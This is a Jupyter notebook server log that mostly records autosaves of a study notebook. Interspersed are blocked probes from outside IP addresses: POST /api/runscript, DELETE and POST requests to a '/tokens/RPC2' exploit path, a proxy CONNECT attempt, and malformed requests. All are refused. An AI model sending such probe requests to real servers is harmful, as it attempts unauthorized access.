[I 2024-08-02 08:25:29.371 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:27:29.685 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:29:29.963 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:47:30.828 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:53:31.132 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 08:55:31.427 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:01:31.682 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:03:31.924 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:05:32.155 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:07:32.454 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:08:12.235 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:10:12.724 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:13:24.243 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:15:24.589 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:17:24.907 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:19:25.841 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:21:26.097 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:23:26.382 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:25:26.645 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:27:26.951 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:29:27.173 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:31:27.415 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:33:27.650 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:35:27.906 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:37:28.176 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:39:28.403 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:41:28.642 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:43:28.872 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:44:59.657 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:46:35.909 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:46:50.733 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:47:06.663 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:51:06.888 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:53:07.138 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:55:07.369 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 09:57:07.603 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:11:08.759 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:13:09.074 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:15:09.334 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:17:09.628 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:19:09.899 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:21:10.129 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:23:10.396 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:23:39.776 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:25:40.024 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:27:05.336 ServerApp] Malformed HTTP message from 172.212.60.167: no colon in header line
[I 2024-08-02 10:27:40.307 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:29:40.542 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:31:40.805 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:33:41.073 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:35:41.310 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:37:41.571 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:39:41.823 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:40:48.476 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:41:07.894 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:43:08.130 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:45:08.365 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:46:31.706 ServerApp] 302 GET / (@92.249.48.208) 0.47ms
[I 2024-08-02 10:47:08.746 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:47:44.022 ServerApp] Kernel interrupted: f4b02ff0-99f3-4fe2-a615-3fc19aa9b142
[I 2024-08-02 10:49:07.645 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:49:11.536 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:49:16.548 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:51:37.131 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:53:16.798 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:55:17.058 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:56:35.845 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:56:37.580 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 10:58:36.102 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:00:36.389 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:02:34.124 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:04:34.357 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:06:34.608 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:12:34.886 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:14:35.124 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:15:29.448 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:17:29.793 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:19:30.051 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:20:35.898 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:22:36.148 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:24:36.432 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:26:35.598 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:26:37.413 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:26:39.369 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:27:07.660 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:27:10.978 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:29:07.913 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:31:08.146 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:33:08.385 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:33:27.274 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:35:08.628 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:37:08.965 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:39:09.209 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:43:09.439 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:47:09.697 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:48:33.537 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:48:38.719 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:50:38.982 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:52:30.423 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:54:30.659 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:56:30.908 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 11:58:31.171 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:00:14.965 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:04:15.250 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:04:27.873 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:06:28.220 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:19:27.587 ServerApp] Saving file at /Rampup2024/README.md
[I 2024-08-02 12:22:12.221 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:22:17.181 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:23:46.558 ServerApp] 302 GET / (@206.168.34.59) 0.42ms
[I 2024-08-02 12:23:56.627 ServerApp] 302 GET / (@206.168.34.59) 0.43ms
[I 2024-08-02 12:23:57.498 ServerApp] Malformed HTTP message from 206.168.34.59: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 12:24:02.763 JupyterNotebookApp] 302 GET /tree (@206.168.34.59) 0.75ms
[I 2024-08-02 12:24:03.573 ServerApp] Malformed HTTP message from 206.168.34.59: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 12:24:04.225 ServerApp] 302 GET / (@206.168.34.59) 0.55ms
[I 2024-08-02 12:24:13.676 ServerApp] Malformed HTTP message from 206.168.34.59: Malformed HTTP version in HTTP Request-Line: 'HTTP/2.0'
[I 2024-08-02 12:24:14.110 ServerApp] 302 GET / (@206.168.34.59) 0.44ms
[I 2024-08-02 12:24:17.433 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:26:17.681 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:28:17.916 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:30:18.285 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:31:15.063 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:33:15.360 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:35:15.684 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:37:15.931 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:39:16.165 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:41:01.105 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:43:01.350 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:45:01.602 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:47:01.882 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:49:02.129 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:51:02.362 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:53:02.684 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:55:02.953 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:55:08.044 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:56:06.246 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 12:58:06.514 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:00:06.776 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:02:07.029 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:07:52.441 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:07:56.337 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:07:59.972 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 13:08:18.067 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:79b9d4ae-647d-4a47-a0e1-877fb35d7ffc
[I 2024-08-02 13:13:01.970 ServerApp] 302 GET / (@205.210.31.75) 0.52ms
[I 2024-08-02 13:13:02.437 JupyterNotebookApp] 302 GET /tree? (@205.210.31.75) 0.67ms
[I 2024-08-02 17:17:29.106 ServerApp] 302 GET / (@117.176.248.71) 0.57ms
[I 2024-08-02 17:17:30.273 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 17:17:30.409 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:08cbb9ef-fc25-44e6-a7cb-b541739cec31
[W 2024-08-02 17:22:11.104 LabApp] Could not determine jupyterlab build status without nodejs
[I 2024-08-02 17:22:11.137 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 17:22:11.332 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:81a8fc08-27d5-487b-8a47-d9daae89e4a7
[I 2024-08-02 17:22:12.353 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 17:29:03.991 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:31:04.254 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:39:04.542 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:41:04.812 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:43:05.092 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:45:05.334 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:47:05.589 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:49:05.924 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:51:06.209 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:53:06.503 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 17:57:21.468 ServerApp] 302 GET / (@12.36.54.51) 0.59ms
[I 2024-08-02 18:02:53.256 ServerApp] 302 GET / (@115.198.126.161) 0.43ms
[I 2024-08-02 18:02:53.303 JupyterNotebookApp] 302 GET /tree (@115.198.126.161) 0.56ms
[I 2024-08-02 18:03:06.780 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[W 2024-08-02 18:03:28.155 ServerApp] 403 POST /api/runscript (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 18:03:28.156 ServerApp] 403 POST /api/runscript (@107.172.34.27) 1.62ms referer=None
[W 2024-08-02 18:03:28.678 ServerApp] 404 GET /_images/HUVivl (@107.172.34.27) 2.08ms referer=None
[I 2024-08-02 18:04:45.816 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:06:46.042 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:08:46.278 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:10:46.518 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:12:46.758 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:14:46.988 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:15:18.871 ServerApp] 302 GET / (@205.210.31.246) 0.49ms
[I 2024-08-02 18:16:47.354 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:18:47.658 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:26:47.888 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:28:48.186 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:30:48.421 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:34:48.699 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:36:48.938 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:37:40.422 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:39:40.649 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:41:40.970 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:41:52.582 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:42:39.092 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:44:39.346 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:46:39.597 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:48:39.914 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:50:40.174 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:52:40.436 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:54:40.683 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:55:31.316 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:56:25.580 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:58:18.403 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 18:59:12.169 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:01:12.407 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:03:12.699 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:05:12.933 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:07:13.167 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:09:13.507 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:11:13.768 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:13:14.083 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:15:14.344 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:16:09.505 ServerApp] 302 GET / (@92.249.48.208) 0.43ms
[I 2024-08-02 19:17:14.592 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:19:14.837 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:21:15.135 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:23:15.375 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:24:53.676 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:26:24.280 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:28:00.417 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:30:00.894 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:32:01.161 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:34:01.422 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:36:01.772 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:38:02.072 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:40:02.372 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:42:02.616 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:44:02.867 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:44:58.784 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:46:25.268 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:48:25.517 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 19:50:25.776 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-02 20:20:36.965 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:dd9c79bd-6ebb-4dff-8082-6decdd534098
[I 2024-08-02 20:26:25.091 ServerApp] 302 GET / (@45.156.129.54) 0.51ms
[I 2024-08-02 20:26:25.306 JupyterNotebookApp] 302 GET /tree? (@45.156.129.54) 0.60ms
[W 2024-08-02 20:44:45.973 ServerApp] 403 DELETE /app/rest/users/id:1/tokens/RPC2 (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 20:44:45.974 ServerApp] 403 DELETE /app/rest/users/id:1/tokens/RPC2 (@107.172.34.27) 1.47ms referer=None
[W 2024-08-02 20:44:46.479 ServerApp] 403 POST /app/rest/users/id:1/tokens/RPC2 (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 20:44:46.480 ServerApp] 403 POST /app/rest/users/id:1/tokens/RPC2 (@107.172.34.27) 1.56ms referer=None
[W 2024-08-02 20:44:51.235 ServerApp] 403 DELETE /app/rest/users/id:1/tokens/RPC2 (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 20:44:51.236 ServerApp] 403 DELETE /app/rest/users/id:1/tokens/RPC2 (@107.172.34.27) 1.51ms referer=None
[W 2024-08-02 20:44:51.742 ServerApp] 403 POST /app/rest/users/id:1/tokens/RPC2 (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 20:44:51.743 ServerApp] 403 POST /app/rest/users/id:1/tokens/RPC2 (@107.172.34.27) 1.48ms referer=None
[E 2024-08-02 21:08:11.673 ServerApp] Uncaught exception in write_error
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1753, in _execute
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1298, in send_error
        self.write_error(status_code, **kwargs)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 739, in write_error
        html = self.render_template("%s.html" % status_code, **ns)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 665, in render_template
        ns.update(self.template_namespace)
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 675, in template_namespace
        logged_in=self.logged_in,
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 198, in logged_in
        user = self.current_user
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1424, in current_user
        self._current_user = self.get_current_user()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 177, in get_current_user
        raise RuntimeError(msg)
    RuntimeError: Calling `Template404.get_current_user()` directly is deprecated in jupyter-server 2.0. Use `self.current_user` instead (works in all versions).
[W 2024-08-02 21:08:11.673 ServerApp] 405 CONNECT google.com:443 (@194.165.17.13) 1.31ms referer=None
[W 2024-08-02 21:27:36.069 LabApp] Could not determine jupyterlab build status without nodejs
[I 2024-08-02 21:27:36.171 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-02 21:27:36.367 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:c7266109-fa17-4f97-bc57-dc6a97763ba0
